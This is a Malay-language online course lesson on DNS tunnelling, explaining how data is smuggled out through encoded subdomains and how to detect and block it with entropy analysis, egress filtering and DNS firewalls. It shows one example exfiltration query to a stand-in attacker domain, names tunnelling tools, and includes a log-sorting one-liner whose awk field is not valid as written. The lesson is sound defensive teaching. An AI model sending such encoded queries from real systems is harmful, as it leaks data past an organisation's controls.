Cyber Security Academy · Pelajaran

Terowong DNS dan Penyaringan Keluar

Menyeludup data melalui DNS.

Pelajaran 3 daripada 413 langkah

Terowong DNS dan Penyaringan Keluar ialah pelajaran Cyber Security Academy percuma di CoddyKit. Ini ialah pelajaran 3 daripada 4. Sebanyak 3 pelajaran dalam laluan pembelajaran ini boleh dibaca sepenuhnya secara percuma — selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan praktikal dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Pelajaran ini merupakan sebahagian daripada laluan pembelajaran Cyber Security Academy, dan kemajuan anda disegerakkan merentas web serta aplikasi CoddyKit. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Menyeludup Data melalui DNS

Terowong DNS mengekod data sewenang-wenangnya di dalam pertanyaan dan jawapan DNS, lalu menjadikan sistem nama sebagai saluran komunikasi tersembunyi. Oleh sebab hampir setiap rangkaian membenarkan DNS keluar dari sempadan rangkaian, DNS menjadi laluan kegemaran untuk pengekstrakan data serta arahan dan kawalan (C2).

Jika tembok api anda menyekat segala-galanya tetapi penyelesai masih menjawab, penyerang boleh menyalurkan saluran dua hala penuh melalui DNS.

Cara Saluran Ini Berfungsi

Penyerang mengawal pelayan nama berautoriti bagi suatu domain, contohnya tunnel.evil.com. Implan mengekod data keluar ke dalam subdomain (label sebelah kiri) bagi pertanyaan:

  • Data dihantar keluar sebagai <base32-chunk>.tunnel.evil.com.
  • Pelayan berautoriti mengembalikan arahan di dalam rekod TXT, CNAME atau NULL.

Setiap pasangan pertanyaan/jawapan membawa cebisan muatan yang kecil.

ZXhmaWx0cmF0ZWQtc2VjcmV0.tunnel.evil.com
# Encoded chunk smuggled in the query label

Pilihan Pengekodan

Label DNS tidak peka huruf besar dan kecil serta mempunyai panjang terhad, jadi data binari biasanya dikodkan menggunakan Base32 (Base64 mencampurkan huruf besar dan kecil serta menggunakan aksara yang tidak selamat). Kekangan yang perlu dipatuhi:

  • Setiap label maksimum 63 aksara.
  • Nama keseluruhan maksimum 255 aksara.
  • Oleh itu, setiap pertanyaan hanya membawa paling banyak beberapa ratus bait.

Kadar pemindahan yang rendah ini menyebabkan pengekstrakan melalui DNS menjadi perlahan dan menghasilkan banyak pertanyaan, yang turut menjadikannya mudah dikesan.

Jenis Rekod yang Digunakan

Jenis rekod yang berbeza memaksimumkan kapasiti hiliran:

  • TXT — muatan teks bebas yang besar, jenis utama untuk balasan C2.
  • NULL — bait mentah, digunakan oleh alat lama seperti iodine.
  • CNAME / MX — kapasiti sederhana, mudah menyamar sebagai trafik yang sah.
  • A / AAAA — kapasiti rendah tetapi sangat biasa dan tidak menonjol.

Alat yang Biasa Digunakan

Utiliti penyaluran terowong yang terkenal dan patut anda kenal pasti dalam pengesanan:

  • iodine — terowong IP melalui DNS yang menggunakan rekod NULL/TXT.
  • dnscat2 — saluran C2 disulitkan melalui DNS.
  • DNSExfiltrator — pengekstrakan fail berperingkat.
  • Cobalt Strike DNS beacon — biasa digunakan oleh pasukan merah dan dalam pencerobohan sebenar.

Alat ini mempunyai corak pertanyaan dan tandatangan entropi yang mudah dikenal pasti.

Mod Perlahan dan Pantas

Penyerang menala terowong tersebut: profil kadar rendah dan perlahan menghantar beberapa pertanyaan sahaja seminit untuk mengelakkan ambang volum, sesuai untuk pengekstrakan rahsia kecil secara tersembunyi seperti kelayakan atau kunci.

Profil kadar pemindahan tinggi memaksimumkan pertanyaan untuk C2 interaktif atau pemindahan pukal, dengan mengorbankan penyamaran demi kelajuan. Logik pengesanan mesti mengenal pasti kedua-dua keadaan ekstrem.

Isyarat Pengesanan: Entropi

Subdomain yang dikodkan kelihatan seperti rentetan rawak, jadi subdomain tersebut mempunyai entropi tinggi berbanding nama domain semula jadi. Pengiraan entropi Shannon bagi setiap label ialah heuristik yang kukuh.

Nama yang sah biasanya cenderung berupa rentetan yang mudah disebut dan berentropi rendah; xj4k9d2mq7zp1.tunnel.evil.com jelas menonjol. Tandakan domain yang entropi subdomainnya melebihi ambang yang ditetapkan.

Isyarat Pengesanan: Volum dan Panjang

Petunjuk tingkah laku yang lain:

  • Bilangan pertanyaan yang tinggi luar biasa ke satu domain daripada satu hos.
  • Nama pertanyaan yang panjang dan menghampiri had 255 bait.
  • Penggunaan rekod TXT atau NULL yang tidak seimbang.
  • Banyak subdomain unik di bawah satu induk (kardinaliti tinggi).
  • Pertanyaan ke domain yang baharu atau bereputasi rendah.
# Top talkers by unique subdomain count per parent domain
sort dns.log | awk '{print $domain}' | sort | uniq -c | sort -rn | head

Mengapa Penapisan Trafik Keluar Membantu

Titik akhir tidak sepatutnya berkomunikasi dengan DNS secara langsung melalui internet. Paksa semua klien menggunakan penyelesai dalaman dan sekat UDP/TCP 53 keluar pada tembok api.

Ini menyalurkan DNS melalui titik kawalan yang terkawal, tempat anda boleh merekodkan aktiviti, memeriksa trafik dan menggunakan risikan ancaman. Langkah ini juga memutuskan implan yang menetapkan penyelesai luaran secara tertanam seperti 8.8.8.8.

Mitigasi Berlapis

Gabungkan kawalan untuk menghentikan penyaluran terowong:

  • Pusatkan penyelesaian nama; sekat port 53 luaran secara langsung.
  • Laksanakan tembok api DNS / RPZ dengan suapan reputasi.
  • Jana amaran untuk entropi, panjang pertanyaan, kadar NXDOMAIN dan kardinaliti bagi setiap domain.
  • Hadkan kadar dan saiz pertanyaan jika boleh.
  • Pantau DoH ke titik akhir yang tidak diketahui kerana tindakan ini menyembunyikan terowong di dalam HTTPS.

DoH: Titik Buta Pengesanan

DNS melalui HTTPS membungkus pertanyaan dalam TLS ke 443, jadi pemantauan tradisional port-53 tidak melihat apa-apa. Implan yang menggunakan DoH ke titik akhir penyangak boleh menyalurkan data tanpa dikesan oleh perekodan DNS pasif.

Kurangkan risiko dengan menetapkan titik akhir kepada penyelesai DoH yang diluluskan, menyekat alamat IP atau nama hos DoH awam yang diketahui pada peranti terurus, serta memeriksa SNI TLS dan reputasi destinasi.

Semakan Pantas

Uji naluri pengesanan anda.

Imbas Kembali

Terowong DNS menyalahgunakan subdomain pertanyaan dan rekod jawapan (TXT, NULL, CNAME) untuk mewujudkan saluran tersembunyi bagi pengekstrakan data dan C2. Kadar pemindahannya rendah, menjadikannya perlahan tetapi tersembunyi. Alat seperti iodine dan dnscat2 meninggalkan corak yang mudah dikenal pasti.

Kesan terowong menggunakan analitik entropi, panjang pertanyaan, volum dan kardinaliti; cegah dengan penyelesai berpusat, penapisan trafik keluar, tembok api DNS/RPZ dan kawalan terhadap DoH. Seterusnya: cara DNSSEC dan penapisan mempertahankan sistem nama secara keseluruhan.

Percuma untuk bermula

Pelajari Cyber Security Academy dengan tutor kecerdasan buatan — percuma

Tulis dan jalankan kod sebenar dalam pelayar anda, dapatkan bantuan segera daripada tutor kecerdasan buatan yang tersedia 24/7, dan sambung semula dari tempat anda berhenti di web atau dalam aplikasi.

Kursus
76
Pelajaran
303

Soalan Lazim

Adakah pelajaran “Terowong DNS dan Penyaringan Keluar” percuma?

Ya — sebanyak 3 pelajaran dalam laluan pembelajaran Cyber Security Academy, termasuk “Terowong DNS dan Penyaringan Keluar”, boleh dibaca sepenuhnya secara percuma di web ini. Selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan interaktif dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Kursus Cyber Security Academy merangkumi sejumlah 4 pelajaran.

Apakah yang akan saya pelajari dalam “Terowong DNS dan Penyaringan Keluar”?

Menyeludup data melalui DNS. Anda berlatih Cyber Security Academy menggunakan kod praktikal yang dijalankan terus dalam pelayar, manakala tutor kecerdasan buatan 24/7 menjawab soalan anda semasa anda mengikuti pelajaran.

Adakah saya memerlukan pengalaman untuk memulakan Cyber Security Academy?

Tiada pengalaman terdahulu diperlukan. Pembelajaran Cyber Security Academy di CoddyKit disusun untuk pelajar daripada peringkat pemula hingga lanjutan, jadi anda boleh bermula di sini atau dari awal dan belajar mengikut kadar anda sendiri. Ini ialah pelajaran 3 daripada 4.

Berapa lamakah pelajaran “Terowong DNS dan Penyaringan Keluar” diambil?

Kebanyakan pelajaran CoddyKit mengambil masa kira-kira 5–10 minit. Setiap pelajaran ringkas dan interaktif, jadi anda boleh membuat kemajuan secara berterusan dan menyambung tepat dari tempat anda berhenti di web atau aplikasi.

Bolehkah saya menulis dan menjalankan kod dalam pelajaran Cyber Security Academy ini?

Ya. Setiap pelajaran Cyber Security Academy menyertakan penyunting kod terbina dalam, jadi anda boleh menulis dan menjalankan kod sebenar terus dalam pelayar serta menerima maklum balas kecerdasan buatan serta-merta — tanpa memerlukan persediaan setempat.

Semua pelajaran dalam kursus ini

  1. Cara DNS Berfungsi dan Risikonya
  2. Pemalsuan DNS dan Keracunan Cache
  3. Terowong DNS dan Penyaringan Keluar
  4. DNSSEC dan Penapisan DNS
← Kembali ke Cyber Security Academy